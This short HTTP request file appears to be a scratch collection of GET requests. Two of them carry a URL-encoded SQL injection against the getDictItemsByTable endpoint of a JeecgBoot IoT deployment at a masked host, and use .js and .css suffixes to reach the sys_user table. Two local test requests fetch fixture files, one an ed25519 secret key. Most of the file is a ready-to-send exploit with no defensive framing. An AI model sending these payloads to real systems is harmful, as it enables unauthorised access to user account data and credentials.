### iot
GET https://iot.xxx.com:4433/jeecg-boot/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js

### getDictItemsByTable
GET https://iot.xxx.com:4433/jeecg-boot/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.css

### test index
GET http://localhost:8080/fixtures/ed25519.sk

### test index
GET http://localhost:8080/fixtures/b64.txt
